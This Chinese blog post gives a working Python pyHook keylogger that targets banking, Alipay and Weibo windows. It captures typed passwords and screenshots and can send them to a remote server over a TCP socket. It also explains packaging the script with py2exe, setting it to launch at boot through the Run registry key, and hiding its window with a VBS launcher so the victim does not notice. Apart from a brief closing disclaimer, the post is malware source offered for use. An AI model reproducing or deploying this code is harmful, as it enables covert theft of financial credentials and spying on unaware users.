Python利用pyHook实现监听用户鼠标与键盘事件

从网上看到的,正好和自己想做的东西很像, 日后改成python3版本并修改完善。

本文以一段简单的监听鼠标、键盘事件的程序,实现获取用户的输入(比如登录某些网站的账号、密码)的功能。经测试,对于一台“裸奔”的电脑,完全能获取到用户输入的任何信息;但是如果安装了杀毒软件,就够呛了。具体实现方法如下:

一、代码部分:获取用户输入信息,并与截图一起保存到XX目录下

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# -*- coding: utf-8 -*- #
 
import pythoncom
import pyHook 
import time
import socket
from PIL import ImageGrab
 
#
#如果是远程监听某个目标电脑,可以自己架设一个服务器,然后将获取到的信息发回给服务器
#
def send_msg_to_server(msg):
   host = ""
   port = 1234
   buf_size = 1024
   addr = (host,port)
   if len (msg)> 0 :
     tcp_client_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     tcp_client_sock.connect(addr)
     info = time.strftime( '%Y%m%d%H%M%S' ,time.localtime(time.time())) + ' from ' + socket.gethostname() + ':'
     tcp_client_sock.sendall(info + msg)
     tcp_client_sock.close()
     
#
#也可以将获取到的信息保存到本地文件下
#
def write_msg_to_txt(msg): 
   f = open ( 'D:/workspace/mytest/pyhook/media/monitor.txt' , 'a' )
   f.write(msg + '\r\n' )
   f.close()
 
def onMouseEvent(event):
   # 监听鼠标事件  
   global MSG
   if len (MSG)! = 0 :   
     #send_msg_to_server(MSG)
     write_msg_to_txt(MSG)
     MSG = ''
     pic_name = time.strftime( '%Y%m%d%H%M%S' ,time.localtime(time.time()))
     #将用户屏幕截图,保存到本地某个目录下(也可以搞成远程发送到自己的服务器)
     pic = ImageGrab.grab()
     pic.save( 'D:/workspace/mytest/pyhook/media/mouse_%s.png' % pic_name)
   return True
  
def onKeyboardEvent(event):
   #监听键盘事件
   global MSG
   title = event.WindowName.decode( 'GBK' )
   #通过网站title,判断当前网站是否是“监听目标”
   if title.find(u "支付宝" ) ! = - 1 or title.find(u '新浪微博' )! = - 1 or title.find(u '浦发银行' )! = - 1 :
     #Ascii: 8-Backspace , 9-Tab ,13-Enter
     if ( 127 > = event.Ascii > 31 ) or (event.Ascii = = 8 ):
       MSG + = chr (event.Ascii)       
     if (event.Ascii = = 9 ) or (event.Ascii = = 13 ):     
       #send_msg_to_remote(MSG)
       write_msg_to_txt(MSG)
       MSG = ''
       #屏幕抓图实现
       pic_name = time.strftime( '%Y%m%d%H%M%S' ,time.localtime(time.time()))
       pic = ImageGrab.grab()
       #保存成为以日期命名的图片
       pic.save( 'D:/workspace/mytest/pyhook/media/keyboard_%s.png' % pic_name)
   return True
  
if __name__ = = "__main__" :  
   MSG = '' 
   #创建hook句柄
   hm = pyHook.HookManager()
 
   #监控鼠标
   hm.SubscribeMouseLeftDown(onMouseEvent)
   hm.HookMouse()
 
   #监控键盘
   hm.KeyDown = onKeyboardEvent
   hm.HookKeyboard()
 
   #循环获取消息
   pythoncom.PumpMessages()

二、用py2exe将脚本打包:

新建一个py文件setup.py,内容如下:

?
1
2
3
4
from distutils.core import setup
import py2exe
setup(console = [ "monitor.py" ])
#setup(windows=["monitor.py"])

命令行执行以下命令:

?
1
pythonsetup.pypy2exe

三、将该程序设置为开机自动启动:

步骤①:

将需要开机启动的文件(创建一个快捷方式,然后)放到“开始/所有程序/启动”目录下

步骤②:

修改注册表:命令行— regedit ,然后到以下路径下:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]  

新建一个“字符串值”,然后编辑:设置exe文件所在路径
D:\workspace\mytest\pyhook\dist\monitor.exe

(以上两种方式启动monitor.exe的话,会弹出一个命令框,显示监听日志信息,这样的话,被监听的人一下就能发现了,可以试试下面这个方式)

步骤③:

新建一个 .vbs文件,内容如下:

?
1
2
setwscriptObj=CreateObject( "Wscript.Shell" )
wscriptObj.run“D:\workspace\mytest\pyhook\dist\monitor.exe",0

双击运行该vbs文件,则monitor.exe就在后台启动了(不会弹出一个大黑框)。
然后参考法①、② 把该vbs设置成开机启动即可。

补充:

1、该程序涉及到一些模块都需要自己安装一下;
2、文章中凡是“D:\workspace....”这样的路径都需要改成自己的真实路径;
3、本代码仅为测试示例,读者不要将其用于非法用途。

你可能感兴趣的:(小程序)